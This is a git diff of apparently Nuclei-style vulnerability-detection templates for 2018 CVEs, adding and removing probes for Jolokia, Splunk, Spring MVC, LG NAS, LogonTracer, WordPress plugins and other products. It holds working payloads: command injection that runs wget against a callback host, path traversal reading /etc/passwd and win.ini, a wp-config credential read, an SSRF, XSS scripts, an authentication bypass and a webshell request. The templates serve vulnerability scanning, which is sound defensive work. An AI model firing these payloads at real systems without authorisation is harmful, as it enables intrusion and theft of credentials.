0000000000..d05ad17b90 --- /dev/null +++ b/poc/cve/cve-2018-1000129.yaml @@ -0,0 +1,57 @@ +id: CVE-2018-1000129 + +info: + name: Jolokia 1.3.7 - Cross-Site Scripting + author: mavericknerd,0h1in9e,daffainfo + severity: medium + description: | + Jolokia 1.3.7 is vulnerable to cross-site scripting in the HTTP servlet and allows an attacker to execute malicious JavaScript in the victim's browser. + remediation: | + Upgrade to a patched version of Jolokia or apply the necessary security patches to mitigate the XSS vulnerability. + reference: + - https://jolokia.org/#Security_fixes_with_1.5.0 + - https://github.com/rhuss/jolokia/commit/5895d5c137c335e6b473e9dcb9baf748851bbc5f#diff-f19898247eddb55de6400489bff748ad + - https://blog.gdssecurity.com/labs/2018/4/18/jolokia-vulnerabilities-rce-xss.html + - https://blog.it-securityguard.com/how-i-made-more-than-30k-with-jolokia-cves/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-1000129 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-1000129 + cwe-id: CWE-79 + epss-score: 0.00257 + epss-percentile: 0.63364 + cpe: cpe:2.3:a:jolokia:jolokia:1.3.7:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: jolokia + product: jolokia + tags: cve,cve2018,jolokia,xss + +http: + - method: GET + path: + - "{{BaseURL}}/api/jolokia/read?mimeType=text/html" + - "{{BaseURL}}/jolokia/read?mimeType=text/html" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "java.lang.IllegalArgumentException" + - "No type with name" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4b0a00483046022100bf12ebc1eef56c2bcd2038e06cd60c8be836fe33c56730676aa1c79e2f436700022100e15bdc55c9aee1a5964dc94acbe4d9a1141591b8cc68bd0eb02fe0241481cc20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-1000226-3139.yaml b/poc/cve/cve-2018-1000226-3139.yaml deleted file mode 100644 index 9ebcf5d7e6..0000000000 --- a/poc/cve/cve-2018-1000226-3139.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2018-1000226 -info: - name: Cobbler versions 2.6.11+, (2.0.0+ or older versions) - Authentication Bypass - author: c-sh0 - reference: - - https://github.com/cobbler/cobbler/issues/1916 - - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-1000226 - severity: critical - tags: cve,cve2018,cobbler,auth-bypass - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2018-1000226 - cwe-id: CWE-732 -requests: - - raw: - - | - POST {{BaseURL}}/cobbler_api HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml - - - - _CobblerXMLRPCInterface__make_token - - - cobbler - - - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: header - words: - - "Content-Type: text/xml" - - type: word - part: body - words: - - "" - - type: dsl - dsl: - - "!contains(tolower(body), 'faultCode')" - - type: regex - part: body - regex: - - "(.*[a-zA-Z0-9].+==)" diff --git a/poc/cve/cve-2018-10818-3171.yaml b/poc/cve/cve-2018-10818-3171.yaml deleted file mode 100644 index 844ff2c7e6..0000000000 --- a/poc/cve/cve-2018-10818-3171.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2018-10818 - -info: - name: LG NAS Devices - Remote Code Execution (Unauthenticated) - author: gy741 - severity: critical - description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the "password" parameter. - reference: - - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ - - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247 - classification: - cve-id: CVE-2018-10818 - tags: cve,cve2018,lg-nas,rce,oast,injection - -requests: - - raw: - - | - POST /system/sharedir.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - &uid=10; wget http://{{interactsh-url}} - - - | - POST /en/php/usb_sync.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - &act=sync&task_number=1;wget http://{{interactsh-url}} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2018-11409.yaml b/poc/cve/cve-2018-11409.yaml new file mode 100644 index 0000000000..97307fe175 --- /dev/null +++ b/poc/cve/cve-2018-11409.yaml @@ -0,0 +1,46 @@ +id: CVE-2018-11409 + +info: + name: Splunk <=7.0.1 - Information Disclosure + author: harshbothra_ + severity: medium + description: Splunk through 7.0.1 is susceptible to information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key. + remediation: | + Upgrade Splunk to a version higher than 7.0.1 to mitigate the vulnerability. + reference: + - https://github.com/kofa2002/splunk + - https://www.exploit-db.com/exploits/44865/ + - http://web.archive.org/web/20211208114213/https://securitytracker.com/id/1041148 + - https://nvd.nist.gov/vuln/detail/CVE-2018-11409 + - http://www.securitytracker.com/id/1041148 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2018-11409 + cwe-id: CWE-200 + epss-score: 0.89557 + epss-percentile: 0.98463 + cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: splunk + product: splunk + tags: edb,cve,cve2018,splunk + +http: + - method: GET + path: + - '{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json' + - '{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json' + + matchers-condition: and + matchers: + - type: word + words: + - licenseKeys + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100e3ebd015e6ef4bbc9998f71e485da5b27862f9292fb806ca585560b75dd733a4022100f65c3f6f92d9f2cf2e358ab9ae5755274ffbf38d886383f34455bcdb8f5071c8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/cve-2018-1271.yaml b/poc/cve/cve-2018-1271.yaml index 548327e206..2c901d72d1 100644 --- a/poc/cve/cve-2018-1271.yaml +++ b/poc/cve/cve-2018-1271.yaml @@ -1,30 +1,45 @@ id: CVE-2018-1271 + info: - name: Spring MVC Directory Traversal Vulnerability + name: Spring MVC Framework - Local File Inclusion author: hetroublemakr severity: medium - description: Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack. + description: Spring MVC Framework versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported are vulnerable to local file inclusion because they allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). A malicious user can send a request using a specially crafted URL that can lead a directory traversal attack. + remediation: | + Apply the latest security patches and updates provided by the Spring MVC Framework to mitigate this vulnerability. reference: - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d - https://pivotal.io/security/cve-2018-1271 - - http://web.archive.org/web/20210518132800/https://www.securityfocus.com/bid/103699 - https://access.redhat.com/errata/RHSA-2018:1320 + - https://nvd.nist.gov/vuln/detail/CVE-2018-1271 + - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.9 cve-id: CVE-2018-1271 cwe-id: CWE-22 + epss-score: 0.004 + epss-percentile: 0.70707 + cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: vmware + product: spring_framework tags: cve,cve2018,spring,lfi,traversal -requests: + +http: - method: GET path: - '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' - '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' + matchers-condition: and matchers: - type: word words: - 'for 16-bit app support' + - type: status status: - 200 +# digest: 490a0046304402201377a352e5d2b8e850667829c827c23a9aca21c420bffa95af757d0e3f2cbf4c02205fb33a00e676e7861f56c9586523be155895cf5da0f492d4fe8e7d84c2e07c53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-14064-3301.yaml b/poc/cve/cve-2018-14064-3301.yaml deleted file mode 100644 index 5e29e1cb36..0000000000 --- a/poc/cve/cve-2018-14064-3301.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2018-14064 -info: - name: VelotiSmart Wifi - Directory Traversal - author: 0x_Akoko - severity: critical - description: VelotiSmart WiFi B-380 camera devices allow directory traversal via the uc-http service 1.0.0, as demonstrated by /../../etc/passwd on TCP port 80. - reference: - - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac - - https://www.exploit-db.com/exploits/45030 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-14064 - cwe-id: CWE-22 - tags: cve,cve2018,lfi,camera,iot -requests: - - method: GET - path: - - "{{BaseURL}}/../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/12 diff --git a/poc/cve/cve-2018-14728.yaml b/poc/cve/cve-2018-14728.yaml deleted file mode 100644 index 89fb385c06..0000000000 --- a/poc/cve/cve-2018-14728.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2018-14728 - -info: - name: Responsive filemanager 9.13.1 Server-Side Request Forgery - author: madrobot - severity: critical - description: Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter. - remediation: | - Upgrade to a patched version of Responsive Filemanager or apply the necessary security patches to mitigate the SSRF vulnerability. - reference: - - http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html - - https://www.exploit-db.com/exploits/45103/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-14728 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-14728 - cwe-id: CWE-918 - epss-score: 0.96381 - epss-percentile: 0.99433 - cpe: cpe:2.3:a:tecrail:responsive_filemanager:9.13.1:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: tecrail - product: responsive_filemanager - tags: cve,cve2018,ssrf,lfi,packetstorm,edb,intrusive - -http: - - method: POST - path: - - "{{BaseURL}}/filemanager/upload.php" - - body: fldr=&url=file:///etc/passwd - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - -# digest: 4b0a00483046022100d885469712b05ac45397c99f298d40a4f35f51d458dcf1eb2f348d6f37e99d8d0221008877396522c40d91e8310151db81bb0fef4088fbeb7a9ea8e827b7610899af1a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/cve-2018-14912-3315.yaml b/poc/cve/cve-2018-14912-3315.yaml deleted file mode 100644 index f54857e4e3..0000000000 --- a/poc/cve/cve-2018-14912-3315.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2018-14912 -info: - name: cgit < 1.2.1 Directory Traversal - author: 0x_Akoko - severity: critical - description: cgit_clone_objects in CGit before 1.2.1 has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request. - reference: - - https://cxsecurity.com/issue/WLB-2018080034 - - https://nvd.nist.gov/vuln/detail/CVE-2018-14912 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-14912 - cwe-id: CWE-22 - tags: cve,cve18,Cgit,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 diff --git a/poc/cve/cve-2018-15517-3331.yaml b/poc/cve/cve-2018-15517-3331.yaml deleted file mode 100644 index e90608b124..0000000000 --- a/poc/cve/cve-2018-15517-3331.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2018-15517 - -info: - name: D-LINK Central WifiManager Server-Side Request Forgery - description: "D-LINK Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser." - reference: - - http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15517 - author: gy741 - severity: high - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N - cvss-score: 8.60 - cve-id: CVE-2018-15517 - cwe-id: CWE-918 - tags: cve,cve2018,dlink,ssrf,oast - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/" - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - -# Enhanced by mp on 2022/04/06 diff --git a/poc/cve/cve-2018-16133-3358.yaml b/poc/cve/cve-2018-16133-3358.yaml deleted file mode 100644 index bf652a55d2..0000000000 --- a/poc/cve/cve-2018-16133-3358.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2018-16133 -info: - name: Cybrotech CyBroHttpServer 1.0.3 Directory Traversal - author: 0x_Akoko - severity: medium - description: Cybrotech CyBroHttpServer 1.0.3 allows Directory Traversal in the URI. - reference: - - https://packetstormsecurity.com/files/149177/Cybrotech-CyBroHttpServer-1.0.3-Directory-Traversal.html - - http://www.cybrotech.com/ - - https://www.cvedetails.com/cve/CVE-2018-16133 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2018-16133 - cwe-id: CWE-22 - tags: cve,cve2018,cybrotech,lfi -requests: - - raw: - - |+ - GET \..\..\..\..\Windows\win.ini HTTP/1.1 - Host: {{Hostname}} - - unsafe: true - matchers: - - type: word - part: body - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and diff --git a/poc/cve/cve-2018-16167-3359.yaml b/poc/cve/cve-2018-16167-3359.yaml new file mode 100644 index 0000000000..59d9a3a939 --- /dev/null +++ b/poc/cve/cve-2018-16167-3359.yaml @@ -0,0 +1,29 @@ +id: CVE-2018-16167 +info: + name: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated) + author: gy741 + severity: critical + description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors. + reference: + - https://www.exploit-db.com/exploits/49918 + - https://nvd.nist.gov/vuln/detail/CVE-2018-16167 + tags: cve,cve2018,logontracer,rce,oast + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-16167 + cwe-id: CWE-78 +requests: + - raw: + - | + POST /upload HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/poc/cve/cve-2018-16288-3365.yaml b/poc/cve/cve-2018-16288-3365.yaml new file mode 100644 index 0000000000..d31045c5bb --- /dev/null +++ b/poc/cve/cve-2018-16288-3365.yaml @@ -0,0 +1,32 @@ +id: CVE-2018-16288 + +info: + name: LG SuperSign EZ CMS 2.5 - Local File Inclusion + author: daffainfo + severity: high + description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs. + reference: + - https://www.exploit-db.com/exploits/45440 + - https://www.cvedetails.com/cve/CVE-2018-16288 + tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.60 + cve-id: CVE-2018-16288 + cwe-id: CWE-200 + +requests: + - method: GET + path: + - "{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2018-17422-3421.yaml b/poc/cve/cve-2018-17422-3421.yaml deleted file mode 100644 index 68f71442de..0000000000 --- a/poc/cve/cve-2018-17422-3421.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2018-17422 -info: - name: dotCMS < 5.0.2 - Open Redirect - author: 0x_Akoko,daffainfo - severity: medium - description: | - dotCMS before 5.0.2 has open redirects via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. - reference: - - https://github.com/dotCMS/core/issues/15286 - - https://www.cvedetails.com/cve/CVE-2018-17422 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-17422 - cwe-id: CWE-601 - metadata: - shodan-query: http.title:"dotCMS" - verified: "true" - tags: cve,cve2018,redirect,dotcms -requests: - - method: GET - path: - - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh' - - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh' - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "self.location = 'http://www.interact.sh'" - - type: status - status: - - 200 diff --git a/poc/cve/cve-2018-17431-3423.yaml b/poc/cve/cve-2018-17431-3423.yaml new file mode 100644 index 0000000000..43bc26ce6b --- /dev/null +++ b/poc/cve/cve-2018-17431-3423.yaml @@ -0,0 +1,38 @@ +id: CVE-2018-17431 +info: + name: Comodo Unified Threat Management Web Console - Remote Code Execution + author: dwisiswant0 + severity: critical + description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 are susceptible to a web shell based remote code execution vulnerability. + reference: + - https://www.exploit-db.com/exploits/48825 + - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276 + - https://nvd.nist.gov/vuln/detail/CVE-2018-17431 + - https://github.com/Fadavvi/CVE-2018-17431-PoC#confirmation-than-bug-exist-2018-09-25-ticket-id-xwr-503-79437 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-17431 + cwe-id: CWE-287 + tags: cve,cve2018,comodo,rce +requests: + - raw: + - | + GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1 + Host: {{Hostname}} + Connection: close + - | # to triggering RCE + GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1 + Host: {{Hostname}} + Connection: close + matchers-condition: and + matchers: + - type: word + words: + - "Configuration has been altered" + part: body + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/13 diff --git a/poc/cve/cve-2018-19386.yaml b/poc/cve/cve-2018-19386.yaml deleted file mode 100644 index 99c0432e06..0000000000 --- a/poc/cve/cve-2018-19386.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2018-19386 - -info: - name: SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting - author: pikpikcu - severity: medium - description: SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI. - remediation: | - Apply the latest patch or upgrade to a non-vulnerable version of SolarWinds Database Performance Analyzer. - reference: - - https://i.imgur.com/Y7t2AD6.png - - https://medium.com/greenwolf-security/reflected-xss-in-solarwinds-database-performance-analyzer-988bd7a5cd5 - - https://nvd.nist.gov/vuln/detail/CVE-2018-19386 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-19386 - cwe-id: CWE-79 - epss-score: 0.00177 - epss-percentile: 0.54825 - cpe: cpe:2.3:a:solarwinds:database_performance_analyzer:11.1.457:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: solarwinds - product: database_performance_analyzer - tags: cve,cve2018,solarwinds,xss - -http: - - method: GET - path: - - "{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f" - - matchers-condition: and - matchers: - - type: word - words: - - '' - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/cve/cve-2018-19877(1).yaml b/poc/cve/cve-2018-19877(1).yaml deleted file mode 100644 index 1a7a7645d2..0000000000 --- a/poc/cve/cve-2018-19877(1).yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2018-19877 -info: - name: Adiscon LogAnalyzer 4.1.7 - Cross Site Scripting - author: arafatansari - severity: medium - description: | - Adiscon LogAnalyzer before 4.1.7 is affected by Cross-Site Scripting (XSS) in the 'referer' parameter of the login.php file. - reference: - - https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/ - - https://www.exploit-db.com/exploits/45958/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-19877 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2018,adiscon,xss -requests: - - method: GET - path: - - "{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E" - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'value="">' - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/cve/cve-2018-20010(1).yaml b/poc/cve/cve-2018-20010(1).yaml deleted file mode 100644 index ca5de31180..0000000000 --- a/poc/cve/cve-2018-20010(1).yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: CVE-2018-20010 -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /assets/add/ssl-provider-account.php Username field. - reference: - - https://www.exploit-db.com/exploits/46373/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-20010 - - https://github.com/domainmod/domainmod/issues/88 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-20010 - cwe-id: CWE-79 - metadata: - verified: true - tags: cve,cve2018,domainmod,xss,authenticated -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - POST /assets/add/ssl-provider-account.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes= - - | - GET /assets/ssl-accounts.php HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' - - 'contains(body_3, ">")' - condition: and diff --git a/poc/cve/cve-2018-20011(1).yaml b/poc/cve/cve-2018-20011(1).yaml new file mode 100644 index 0000000000..b48e1aa0cb --- /dev/null +++ b/poc/cve/cve-2018-20011(1).yaml @@ -0,0 +1,47 @@ +id: CVE-2018-20011 +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /assets/add/category.php CatagoryName, StakeHolder parameters. + reference: + - https://www.exploit-db.com/exploits/46374/ + - https://github.com/domainmod/domainmod/issues/88 + - https://nvd.nist.gov/vuln/detail/CVE-2018-20011 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-20011 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve1028,domainmod,xss,authenticated +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /assets/add/category.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes= + - | + GET /assets/categories.php HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + redirects: true + max-redirects: 2 + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(all_headers_3, "text/html")' + - 'contains(body_3, ">")' + condition: and diff --git a/poc/cve/cve-2018-20470-3497.yaml b/poc/cve/cve-2018-20470-3497.yaml deleted file mode 100644 index 913e599c3a..0000000000 --- a/poc/cve/cve-2018-20470-3497.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2018-20470 - -info: - name: Tyto Sahi pro 7.x/8.x - Local File Inclusion - author: daffainfo - severity: high - description: | - Tyto Sahi Pro versions through 7.x.x and 8.0.0 are susceptible to a local file inclusion vulnerability in the web reports module which can allow an outside attacker to view contents of sensitive files. - reference: - - https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/ - - http://packetstormsecurity.com/files/153330/Sahi-Pro-7.x-8.x-Directory-Traversal.html - - https://nvd.nist.gov/vuln/detail/CVE-2018-20470 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-20470 - cwe-id: CWE-22 - tags: cve,cve2018,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and - - - type: status - status: - - 200 -# Enhanced by mp on 2022/06/17 diff --git a/poc/cve/cve-2018-20985-3507.yaml b/poc/cve/cve-2018-20985-3507.yaml deleted file mode 100644 index c641ac61ca..0000000000 --- a/poc/cve/cve-2018-20985-3507.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2018-20985 -info: - name: WordPress Payeezy Pay <=2.97 - Local File Inclusion - author: daffainfo - severity: critical - description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected. - reference: - - https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/ - - https://wordpress.org/plugins/wp-payeezy-pay/#developers - - https://www.cvedetails.com/cve/CVE-2018-20985/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-20985 - cwe-id: CWE-20 - tags: cve,cve2018,wordpress,lfi,plugin -requests: - - method: POST - path: - - "{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php" - body: "x_login=../../../wp-config" - matchers-condition: and - matchers: - - type: word - words: - - "The base configuration for WordPress" - - "define( 'DB_NAME'," - - "define( 'DB_PASSWORD'," - condition: and - part: body - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/13 diff --git a/poc/cve/cve-2018-3167.yaml b/poc/cve/cve-2018-3167.yaml deleted file mode 100644 index 44aa36c08d..0000000000 --- a/poc/cve/cve-2018-3167.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: CVE-2018-3167 - -info: - name: Oracle E-Business Suite - Blind SSRF - author: geeknik - severity: medium - description: Oracle E-Business Suite, Application Management Pack component (User Monitoring subcomponent), is susceptible to blind server-side request forgery. An attacker with network access via HTTP can gain read access to a subset of data, connect to internal services like HTTP-enabled databases, or perform post requests towards internal services which are not intended to be exposed. Affected supported versions are 12.1.3, 12.2.3, 12.2.4, 12.2.5, 12.2.6, and 12.2.7. - remediation: | - Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability. - reference: - - 